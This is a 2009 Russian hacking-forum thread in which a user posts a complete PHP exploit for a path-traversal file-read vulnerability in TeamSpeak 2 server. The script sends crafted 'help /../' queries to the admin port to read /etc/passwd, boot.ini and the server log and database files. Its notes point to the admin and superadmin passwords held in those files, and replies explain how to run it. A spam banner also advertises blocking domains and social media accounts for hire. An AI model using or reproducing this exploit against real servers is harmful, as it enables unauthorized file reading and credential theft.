Форум АНТИЧАТ - teamspeak server <= 2.0.23.17 remote read file vuln

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
teamspeak server <= 2.0.23.17 remote read file vuln

Опции темы

Поиск в этой теме

Опции просмотра

teamspeak server <= 2.0.23.17 remote read file vuln

13.01.2009, 04:10

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

teamspeak server <= 2.0.23.17 remote read file vuln

убирайте пробелы, форум мог порезать. или тяните с http://narod.ru/disk/4932619000/ts_xek.php.html

PHP код:


		
			
<?php

// teamspeak server <= 2.0.23.17 remote read file vulnerability

// bug found and exploit write by c411k

// http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734 zazhali ploent svolo4i!!

// tested on win ts2_server_rc2_202317, ts2_server_rc2_20201.exe

// grats all https://forum.antichat.ru

// use http://localhost/ts_xek.php

// 10.01.09



error_reporting(0);

@ini_set("max_execution_time",0);

@ini_set('output_buffering',0);

@set_magic_quotes_runtime(0);

@set_time_limit(0);

@ob_implicit_flush(1);



header("Content-Type: text/html; charset=utf-8\r\n");

header("Pragma: no-cache");



function check_ver($site, $xek, $port)

{

    $url = fsockopen("$site", "$port", $errno, $errstr, 22);

    $send_pac = "$xek\r\n\r\n";

    fputs($url, $send_pac);

    $s = '';

    

    while (!feof($url) and strpos(implode($s), 'OK') === false)

    {

        $s[] = fgets($url, 1028);

    }

    fclose($url);

    return implode($s);

}



function html()

{

    if (isset($_POST['file']))

        $file = $_POST['file'];

    else $file = '../../../../../etc/passwd';

    echo 

    '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post">

    <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="parampampam" type="submit" value=" read file... ">

    <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="check_ver" type="submit" value=" check_version "><br>

    <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD"> ¬ teamspeak hostname or ip, for expamle "ts.antichat.ru"

    <input style="background-color: #31333B; color: #B9B9BD;" name="port" value="51234"><font color="#B9B9BD"> ¬ port to TCQquery admin, default 51234

    <input style="background-color: #31333B; color: #B9B9BD;" name="file" value="'.$file.'"><font color="#B9B9BD"> ¬ file to read.';

}



function info()

{

    echo

    '<br>

    for example: 

    server.log

    server.dbs

    ../../../../../boot.ini

    ../../../../../etc/passwd

    ../../../../../usr/local/apache/conf/httpd.conf etc.

    brain on ;)

    

    admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files.

    

    <textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>---------------------------------------------------------------

-------------- log started at 10-01-09 00:24 -------------

---------------------------------------------------------------

10-01-09 00:24:28,ALL,Info,server,    Server init initialized

10-01-09 00:24:28,ALL,Info,server,    Server version: 2.0.20.1 Win32

10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_servers

10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_server_privileges

10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_channels

10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_channel_privileges

10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_clients

10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_bans

10-01-09 00:24:28,ALL,Info,server,    Starting VirtualServer id:1 with port:8767

10-01-09 00:24:28,WARNING,Info,SERVER,    Default VirtualServer created

10-01-09 00:24:28,WARNING,Info,SERVER,    admin account info: username: admin password: kcqy8y

10-01-09 00:24:28,WARNING,Info,SERVER,    superadmin account info: username: superadmin password: e7em45

10-01-09 00:24:29,ALL,Info,server,    Server init finished</textarea></form>';

}



function head()

{

    echo '<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>xek_teamspeak_2.0.19.50</title>

<style>

<!--

A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}

A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}

A:active {COLOR: #228B22; TEXT-DECORATION: none}

A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}

BODY

{

    margin="5";

    FONT-WEIGHT: normal; 

    COLOR: #B9B9BD; 

    BACKGROUND: #44474F; 

    FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; 

}



-->

</style>

</head>

<body>';

}



head();



if (!$_GET)

{

    html();

    info();

}



if (isset($_GET['go_fuck']))

{

    $hostname = $_POST['hostname'];

    $file = $_POST['file'];

    $port = $_POST['port'];

    

    if (isset($_POST['check_ver']))

    {

        echo '<pre>'.check_ver($hostname, 'ver', $port);

        

    }

    

    if (isset($_POST['parampampam']))

    {

        echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';

        html();

        

    }

}



?>

__________________
ПИУ-ПИУ...

13.01.2009, 04:16

dimhee

Участник форума

Регистрация: 08.03.2007

Сообщений: 191

Провел на форуме:
4081574

Репутация: 214

Отправить сообщение для dimhee с помощью ICQ

А можно описание на русском ? ( для отсталых )

// разобрался , автор молодец .

Последний раз редактировалось dimhee; 13.01.2009 в 08:48..

13.01.2009, 04:31

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

Цитата:

Сообщение от dimhee

А можно описание на русском ? ( для отсталых )

пардон, описание чего? работы или баги?

http://c411k.livejournal.com/2566.html
или
// use http://localhost/ts_xek.php

__________________
ПИУ-ПИУ...

13.01.2009, 08:51

dimhee

Участник форума

Регистрация: 08.03.2007

Сообщений: 191

Провел на форуме:
4081574

Репутация: 214

на оффе как я понял выложено противоядие :? http://forum.teamspeak.com/showthread.php?t=38515

Последний раз редактировалось dimhee; 13.01.2009 в 09:04..

19.01.2009, 20:22

SeCriVe

Новичок

Регистрация: 18.01.2009

Сообщений: 12

Провел на форуме:
190734

Репутация: 41

Отправить сообщение для SeCriVe с помощью ICQ

Расскажите плз как запустить данный скрипт

21.01.2009, 03:29

RekRut

Участник форума

Регистрация: 27.02.2006

Сообщений: 261

Провел на форуме:
515774

Репутация: 71

SeCriVe Денвер пакет поставь себе , запусти и радуйся

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблемы с Записью Cd-R	Nova	Аппаратное обеспечение	17	14.03.2009 17:59
Proxies	KPOT_f!nd	ICQ	2617	22.06.2008 13:30
Нужна консультация (Intranet Chat)	ty3ik	Чаты	3	30.04.2006 19:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход